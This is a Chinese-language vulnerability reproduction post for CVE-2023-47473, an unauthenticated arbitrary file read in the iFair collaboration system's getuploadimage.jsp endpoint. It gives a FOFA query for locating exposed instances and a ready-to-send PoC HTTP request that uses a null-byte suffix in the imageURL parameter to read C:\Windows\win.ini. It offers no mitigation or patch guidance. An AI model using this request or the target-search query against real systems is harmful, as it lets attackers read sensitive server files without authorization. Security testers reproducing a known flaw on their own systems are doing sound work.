企语iFair 协同管理系统 任意文件读取漏洞复现(CVE-2023-47473)

0x01 产品简介

企语iFair协同管理系统是一款专业的协同办公软件，该管理系统兼容性强，适合多种企业类型。该软件永久免费，绿色安全，无需收取费用即可使用所有功能。企语iFair协同管理系统同时兼容了Linux、Windows两种操作系统

0x02 漏洞概述

企语iFair协同管理系统getuploadimage.jsp接口处存在任意文件读取漏洞，未经身份认证的攻击者可以通过此漏洞获取服务器敏感信息，使系统处于极不安全状态。

0x03 影响范围

企语iFair <= v23.8_ad0

0x04 复现环境

FOFA：app="服务社-企语iFair"

0x05 漏洞复现

PoC

GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%001.png HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)